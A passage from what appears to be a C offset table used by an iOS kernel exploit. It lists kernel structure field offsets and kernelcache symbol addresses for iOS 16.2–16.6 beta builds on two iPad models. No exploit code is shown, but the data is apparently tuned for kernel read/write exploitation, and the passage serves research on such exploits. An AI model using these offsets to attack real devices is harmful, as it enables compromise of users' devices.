0x18, .thread__task_threads__prev = 0x368 - 0x18 + 8, .thread__map = 0x368, .thread__thread_id = 0x400, .thread__object_size = 0x4a8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x8, ._vm_map__hdr__links__next = 0x08 + 0x8, ._vm_map__hdr__links__start = 0x10 + 0x8, ._vm_map__hdr__links__end = 0x18 + 0x8, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a23dab0, .kernelcache__gPhysBase = 0xfffffff0078dc288, .kernelcache__gPhysSize = 0xfffffff0078dc288 + 8, .kernelcache__gVirtBase = 0xfffffff0078da440, .kernelcache__perfmon_devices = 0xfffffff00a27d530, .kernelcache__perfmon_dev_open = 0xfffffff007e7e434, .kernelcache__ptov_table = 0xfffffff00788f9a0, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a27c910, .kernelcache__vm_pages = 0xfffffff00788c0f8, .kernelcache__vm_page_array_beginning_addr = 0xfffffff00788e950, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a27c908, .kernelcache__vn_kqfilter = 0xfffffff007eccc44, }, // iPad Gen 8th, Cell, Data // { .kern_version = "Darwin Kernel Version 22.2.0: Mon Nov 28 20:10:15 PST 2022; root:xnu-8792.62.2~1/RELEASE_ARM64_T8020", .build_version = "20C65", .device_id = "iPad11,7", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x538, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x368 - 0x18, .thread__task_threads__prev = 0x368 - 0x18 + 8, .thread__map = 0x368, .thread__thread_id = 0x400, .thread__object_size = 0x4a8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x8, ._vm_map__hdr__links__next = 0x08 + 0x8, ._vm_map__hdr__links__start = 0x10 + 0x8, ._vm_map__hdr__links__end = 0x18 + 0x8, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a0e1178, .kernelcache__gPhysBase = 0xfffffff0077ebc60, .kernelcache__gPhysSize = 0xfffffff0077ebc60 + 8, .kernelcache__gVirtBase = 0xfffffff0077e9e40, .kernelcache__perfmon_devices = 0xfffffff00a11c380, .kernelcache__perfmon_dev_open = 0xfffffff007e3b3ac, .kernelcache__ptov_table = 0xfffffff00779f248, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a11b800, .kernelcache__vm_pages = 0xfffffff00779c080, .kernelcache__vm_page_array_beginning_addr = 0xfffffff00779e208, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a11b7f8, .kernelcache__vn_kqfilter = 0xfffffff007e8da44, }, // iOS 16.3 { .kern_version = "Darwin Kernel Version 22.3.0: Wed Jan 4 21:24:51 PST 2023; root:xnu-8792.82.2~1/RELEASE_ARM64_T8020", .build_version = "20D47", .device_id = "iPad11,7", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x538, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x368 - 0x18, .thread__task_threads__prev = 0x368 - 0x18 + 8, .thread__map = 0x368, .thread__thread_id = 0x400, .thread__object_size = 0x4a8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x8, ._vm_map__hdr__links__next = 0x08 + 0x8, ._vm_map__hdr__links__start = 0x10 + 0x8, ._vm_map__hdr__links__end = 0x18 + 0x8, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a0e1178, .kernelcache__gPhysBase = 0xfffffff0077e7d48, .kernelcache__gPhysSize = 0xfffffff0077e7d48 + 8, .kernelcache__gVirtBase = 0xfffffff0077e5f28, .kernelcache__perfmon_devices = 0xfffffff00a11c380, .kernelcache__perfmon_dev_open = 0xfffffff007e37398, .kernelcache__ptov_table = 0xfffffff00779b288, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a11b800, .kernelcache__vm_pages = 0xfffffff0077980c0, .kernelcache__vm_page_array_beginning_addr = 0xfffffff00779a248, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a11b7f8, .kernelcache__vn_kqfilter = 0xfffffff007e89a20, }, // iOS 16.3.1 { .kern_version = "Darwin Kernel Version 22.3.0: Wed Jan 4 21:24:51 PST 2023; root:xnu-8792.82.2~1/RELEASE_ARM64_T8020", .build_version = "20D67", .device_id = "iPad11,7", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x538, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x368 - 0x18, .thread__task_threads__prev = 0x368 - 0x18 + 8, .thread__map = 0x368, .thread__thread_id = 0x400, .thread__object_size = 0x4a8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x8, ._vm_map__hdr__links__next = 0x08 + 0x8, ._vm_map__hdr__links__start = 0x10 + 0x8, ._vm_map__hdr__links__end = 0x18 + 0x8, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a0e1178, .kernelcache__gPhysBase = 0xfffffff0077e7d48, .kernelcache__gPhysSize = 0xfffffff0077e7d48 + 8, .kernelcache__gVirtBase = 0xfffffff0077e5f28, .kernelcache__perfmon_devices = 0xfffffff00a11c380, .kernelcache__perfmon_dev_open = 0xfffffff007e37398, .kernelcache__ptov_table = 0xfffffff00779b288, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a11b800, .kernelcache__vm_pages = 0xfffffff0077980c0, .kernelcache__vm_page_array_beginning_addr = 0xfffffff00779a248, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a11b7f8, .kernelcache__vn_kqfilter = 0xfffffff007e89a20, }, // iOS 16.4 { .kern_version = "Darwin Kernel Version 22.4.0: Mon Mar 6 20:42:48 PST 2023; root:xnu-8796.102.5~1/RELEASE_ARM64_T8020", .build_version = "20E246", .device_id = "iPad11,7", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x368 - 0x18, .thread__task_threads__prev = 0x368 - 0x18 + 8, .thread__map = 0x368, .thread__thread_id = 0x400, .thread__object_size = 0x4a8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x8, ._vm_map__hdr__links__next = 0x08 + 0x8, ._vm_map__hdr__links__start = 0x10 + 0x8, ._vm_map__hdr__links__end = 0x18 + 0x8, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a19d208, .kernelcache__gPhysBase = 0xfffffff0078c3fa0, .kernelcache__gPhysSize = 0xfffffff0078c3fa0 + 8, .kernelcache__gVirtBase = 0xfffffff0078c2178, .kernelcache__perfmon_devices = 0xfffffff00a1db500, .kernelcache__perfmon_dev_open = 0xfffffff007e55a88, .kernelcache__ptov_table = 0xfffffff007877160, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a1da990, .kernelcache__vm_pages = 0xfffffff007873ea8, .kernelcache__vm_page_array_beginning_addr = 0xfffffff007876110, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a1da988, .kernelcache__vn_kqfilter = 0xfffffff007ea463c, }, // iOS 16.4.1 { .kern_version = "Darwin Kernel Version 22.4.0: Mon Mar 6 20:42:48 PST 2023; root:xnu-8796.102.5~1/RELEASE_ARM64_T8020", .build_version = "20E252", .device_id = "iPad11,7", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x368 - 0x18, .thread__task_threads__prev = 0x368 - 0x18 + 8, .thread__map = 0x368, .thread__thread_id = 0x400, .thread__object_size = 0x4a8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x8, ._vm_map__hdr__links__next = 0x08 + 0x8, ._vm_map__hdr__links__start = 0x10 + 0x8, ._vm_map__hdr__links__end = 0x18 + 0x8, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a19d208, .kernelcache__gPhysBase = 0xfffffff0078c3fa0, .kernelcache__gPhysSize = 0xfffffff0078c3fa0 + 8, .kernelcache__gVirtBase = 0xfffffff0078c2178, .kernelcache__perfmon_devices = 0xfffffff00a1db500, .kernelcache__perfmon_dev_open = 0xfffffff007e55a88, .kernelcache__ptov_table = 0xfffffff007877160, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a1da990, .kernelcache__vm_pages = 0xfffffff007873ea8, .kernelcache__vm_page_array_beginning_addr = 0xfffffff007876110, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a1da988, .kernelcache__vn_kqfilter = 0xfffffff007ea463c, }, // iOS 16.5 { .kern_version = "Darwin Kernel Version 22.5.0: Mon Apr 24 21:10:51 PDT 2023; root:xnu-8796.122.4~1/RELEASE_ARM64_T8020", .build_version = "20F66", .device_id = "iPad11,7", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x368 - 0x18, .thread__task_threads__prev = 0x368 - 0x18 + 8, .thread__map = 0x368, .thread__thread_id = 0x400, .thread__object_size = 0x4a8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x8, ._vm_map__hdr__links__next = 0x08 + 0x8, ._vm_map__hdr__links__start = 0x10 + 0x8, ._vm_map__hdr__links__end = 0x18 + 0x8, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a1a5288, .kernelcache__gPhysBase = 0xfffffff0078c80e0, .kernelcache__gPhysSize = 0xfffffff0078c80e0 + 8, .kernelcache__gVirtBase = 0xfffffff0078c62b8, .kernelcache__perfmon_devices = 0xfffffff00a1e3500, .kernelcache__perfmon_dev_open = 0xfffffff007e59c8c, .kernelcache__ptov_table = 0xfffffff00787b160, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a1e2990, .kernelcache__vm_pages = 0xfffffff007877ea8, .kernelcache__vm_page_array_beginning_addr = 0xfffffff00787a110, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a1e2988, .kernelcache__vn_kqfilter = 0xfffffff007ea8ad8, }, // iOS 16.6b1 { .kern_version = "Darwin Kernel Version 22.6.0: Tue May 9 06:18:00 PDT 2023; root:xnu-8796.140.12.502.1~12/RELEASE_ARM64_T8020", .build_version = "20G5026e", .device_id = "iPad11,7", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x368 - 0x18, .thread__task_threads__prev = 0x368 - 0x18 + 8, .thread__map = 0x368, .thread__thread_id = 0x400, .thread__object_size = 0x4a8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x8, ._vm_map__hdr__links__next = 0x08 + 0x8, ._vm_map__hdr__links__start = 0x10 + 0x8, ._vm_map__hdr__links__end = 0x18 + 0x8, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a23dab0, .kernelcache__gPhysBase = 0xfffffff0078dc288, .kernelcache__gPhysSize = 0xfffffff0078dc288 + 8, .kernelcache__gVirtBase = 0xfffffff0078da440, .kernelcache__perfmon_devices = 0xfffffff00a27d530, .kernelcache__perfmon_dev_open = 0xfffffff007e7e434, .kernelcache__ptov_table = 0xfffffff00788f9a0, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a27c910, .kernelcache__vm_pages = 0xfffffff00788c0f8, .kernelcache__vm_page_array_beginning_addr = 0xfffffff00788e950, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a27c908, .kernelcache__vn_kqfilter = 0xfffffff007eccc44, }, // iPad Mini 5th Gen Wifi// // iOS 16.2 { .kern_version = "Darwin Kernel Version 22.2.0: Mon Nov 28 20:10:15 PST 2022; root:xnu-8792.62.2~1/RELEASE_ARM64_T8020", .build_version = "20C65", .device_id = "iPad11,1", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x538, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x368 - 0x18, .thread__task_threads__prev = 0x368 - 0x18 + 8, .thread__map = 0x368, .thread__thread_id = 0x400, .thread__object_size = 0x4a8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a225178, .kernelcache__gPhysBase = 0xfffffff00781bc60, .kernelcache__gPhysSize = 0xfffffff00781bc60 + 8, .kernelcache__gVirtBase = 0xfffffff007819e40, .kernelcache__perfmon_devices = 0xfffffff00a260380, .kernelcache__perfmon_dev_open = 0xfffffff007e873ac, .kernelcache__ptov_table = 0xfffffff0077cf248, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a25f800, .kernelcache__vm_pages = 0xfffffff0077cc080, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0077ce208, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a25f7f8, .kernelcache__vn_kqfilter = 0xfffffff007ed9a44, }, // iOS 16.3 { .kern_version = "Darwin Kernel Version 22.3.0: Wed Jan 4 21:24:51 PST 2023; root:xnu-8792.82.2~1/RELEASE_ARM64_T8020", .build_version = "20D47", .device_id = "iPad11,1", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 